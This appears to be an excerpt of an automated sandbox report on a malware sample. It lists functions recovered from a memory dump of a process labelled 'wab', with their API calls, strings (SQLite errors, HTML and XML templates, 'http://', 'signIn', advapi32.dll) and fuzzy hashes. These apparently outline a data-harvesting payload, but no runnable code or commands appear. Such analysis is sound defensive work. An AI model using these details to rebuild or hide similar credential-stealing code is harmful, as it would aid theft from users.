                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfilewcscpy$AttributesFileString
                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                      • API String ID: 3176057301-2039793938
                      • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                      • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                      APIs
                      Strings
                      • out of memory, xrefs: 0042F865
                      • unable to open database: %s, xrefs: 0042F84E
                      • database %s is already in use, xrefs: 0042F6C5
                      • too many attached databases - max %d, xrefs: 0042F64D
                      • database is already attached, xrefs: 0042F721
                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                      • cannot ATTACH database within transaction, xrefs: 0042F663
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                      • API String ID: 1297977491-2001300268
                      • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                      • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                      APIs
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                      • memcpy.MSVCRT ref: 0040EB80
                      • memcpy.MSVCRT ref: 0040EB94
                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                      Similarity
                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                      • String ID: ($d
                      • API String ID: 1140211610-1915259565
                      • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                      • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                      APIs
                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                      • Sleep.KERNEL32(00000001), ref: 004178E9
                      • GetLastError.KERNEL32 ref: 004178FB
                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                      Similarity
                      • API ID: File$ErrorLastLockSleepUnlock
                      • String ID:
                      • API String ID: 3015003838-0
                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                      APIs
                      • memset.MSVCRT ref: 00407E44
                      • memset.MSVCRT ref: 00407E5B
                      • _mbscpy.MSVCRT ref: 00407E7E
                      • _mbscpy.MSVCRT ref: 00407ED7
                      • _mbscpy.MSVCRT ref: 00407EEE
                      • _mbscpy.MSVCRT ref: 00407F01
                      • wcscpy.MSVCRT ref: 00407F10
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                      Similarity
                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                      • String ID:
                      • API String ID: 59245283-0
                      • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                      • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                      APIs
                      • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                      • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                      • GetLastError.KERNEL32 ref: 0041855C
                      • Sleep.KERNEL32(00000064), ref: 00418571
                      • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                      • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                      • GetLastError.KERNEL32 ref: 0041858E
                      • Sleep.KERNEL32(00000064), ref: 004185A3
                      • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                      Similarity
                      • API ID: File$AttributesDeleteErrorLastSleep$??3@
                      • String ID:
                      • API String ID: 3467550082-0
                      • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                      • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                      Similarity
                      • API ID: memcpy
                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                      • API String ID: 3510742995-3273207271
                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                      APIs
                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                      • memset.MSVCRT ref: 00413ADC
                      • memset.MSVCRT ref: 00413AEC
                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                      • memset.MSVCRT ref: 00413BD7
                      • wcscpy.MSVCRT ref: 00413BF8
                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                      Similarity
                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                      • String ID: 3A
                      • API String ID: 3300951397-293699754
                      • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                      • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • wcscpy.MSVCRT ref: 0040D1B5
                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                      • wcslen.MSVCRT ref: 0040D1D3
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                      • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • memcpy.MSVCRT ref: 0040D24C
                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                      Similarity
                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                      • String ID: strings
                      • API String ID: 3166385802-3030018805
                      • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                      • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                      APIs
                      • memset.MSVCRT ref: 00411AF6
                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                      • wcsrchr.MSVCRT ref: 00411B14
                      • wcscat.MSVCRT ref: 00411B2E
                      Similarity
                      • API ID: FileModuleNamememsetwcscatwcsrchr
                      • String ID: AE$.cfg$General$EA
                      • API String ID: 776488737-1622828088
                      • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                      • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                      APIs
                      • memset.MSVCRT ref: 0040D8BD
                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                      • memset.MSVCRT ref: 0040D906
                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                      • _wcsicmp.MSVCRT ref: 0040D92F
                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                      Similarity
                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                      • String ID: sysdatetimepick32
                      • API String ID: 1028950076-4169760276
                      • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                      • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                      Similarity
                      • API ID: memcpy$memset
                      • String ID: -journal$-wal
                      • API String ID: 438689982-2894717839
                      • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                      • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                      • EndDialog.USER32(?,00000002), ref: 00405C83
                      • EndDialog.USER32(?,00000001), ref: 00405C98
                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                      Similarity
                      • API ID: Item$Dialog$MessageSend
                      • String ID:
                      • API String ID: 3975816621-0
                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                      APIs
                      • _wcsicmp.MSVCRT ref: 00444D09
                      • _wcsicmp.MSVCRT ref: 00444D1E
                      • _wcsicmp.MSVCRT ref: 00444D33
                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                      Similarity
                      • API ID: _wcsicmp$wcslen$_memicmp
                      • String ID: .save$http://$https://$log profile$signIn
                      • API String ID: 1214746602-2708368587
                      • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                      • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                      Similarity
                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                      • String ID:
                      • API String ID: 2313361498-0
                      • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                      • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                      APIs
                      • GetClientRect.USER32(?,?), ref: 00405F65
                      • GetWindow.USER32(?,00000005), ref: 00405F7D
                      • GetWindow.USER32(00000000), ref: 00405F80
                        • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                      • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                      • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                      • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                      Similarity
                      • API ID: Window$ItemMessageRectSend$Client
                      • String ID:
                      • API String ID: 2047574939-0
                      • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                      • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                      • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                      • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                      Similarity
                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                      • String ID:
                      • API String ID: 4218492932-0
                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                      APIs
                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                        • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                        • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                      • memcpy.MSVCRT ref: 0044A8BF
                      • memcpy.MSVCRT ref: 0044A90C
                      • memcpy.MSVCRT ref: 0044A988
                        • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                        • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                      • memcpy.MSVCRT ref: 0044A9D8
                      • memcpy.MSVCRT ref: 0044AA19
                      • memcpy.MSVCRT ref: 0044AA4A
                      Similarity
                      • API ID: memcpy$memset
                      • String ID: gj
                      • API String ID: 438689982-4203073231
                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                      Similarity
                      • API ID: memcpy
                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                      • API String ID: 3510742995-2446657581
                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                      • memset.MSVCRT ref: 00405ABB
                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                      • SetFocus.USER32(?), ref: 00405B76
                      Similarity
                      • API ID: MessageSend$FocusItemmemset
                      • String ID:
                      • API String ID: 4281309102-0
                      • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                      • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                      Similarity
                      • API ID: _snwprintfwcscat
                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                      • API String ID: 384018552-4153097237
                      • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                      • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                      Similarity
                      • API ID: ItemMenu$CountInfomemsetwcschr
                      • String ID: 0$6
                      • API String ID: 2029023288-3849865405
                      • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                      • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                      APIs
                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                      • memset.MSVCRT ref: 00405455
                      • memset.MSVCRT ref: 0040546C
                      • memset.MSVCRT ref: 00405483
                      • memcpy.MSVCRT ref: 00405498
                      • memcpy.MSVCRT ref: 004054AD
                      Similarity
                      • API ID: memset$memcpy$ErrorLast
                      • String ID: 6$\
                      • API String ID: 404372293-1284684873
                      • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                      • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                      APIs
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                      • wcscpy.MSVCRT ref: 0040A0D9
                      • wcscat.MSVCRT ref: 0040A0E6
                      • wcscat.MSVCRT ref: 0040A0F5
                      • wcscpy.MSVCRT ref: 0040A107
                      Similarity
                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                      • String ID:
                      • API String ID: 1331804452-0
                      • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                      • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                      APIs
                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                      • String ID: advapi32.dll
                      • API String ID: 2012295524-4050573280
                      • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                      • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                      APIs
                      Strings
                      • <?xml version="1.0" ?>, xrefs: 0041007C
                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                      • <%s>, xrefs: 004100A6
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$_snwprintf
                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                      • API String ID: 3473751417-2880344631
                      • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                      • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: wcscat$_snwprintfmemset
                      • String ID: %2.2X
                      • API String ID: 2521778956-791839006
                      • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                      • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _snwprintfwcscpy
                      • String ID: dialog_%d$general$menu_%d$strings
                      • API String ID: 999028693-502967061
                      • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                      • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memsetstrlen
                      • String ID:
                      • API String ID: 2350177629-0
                      • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                      • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
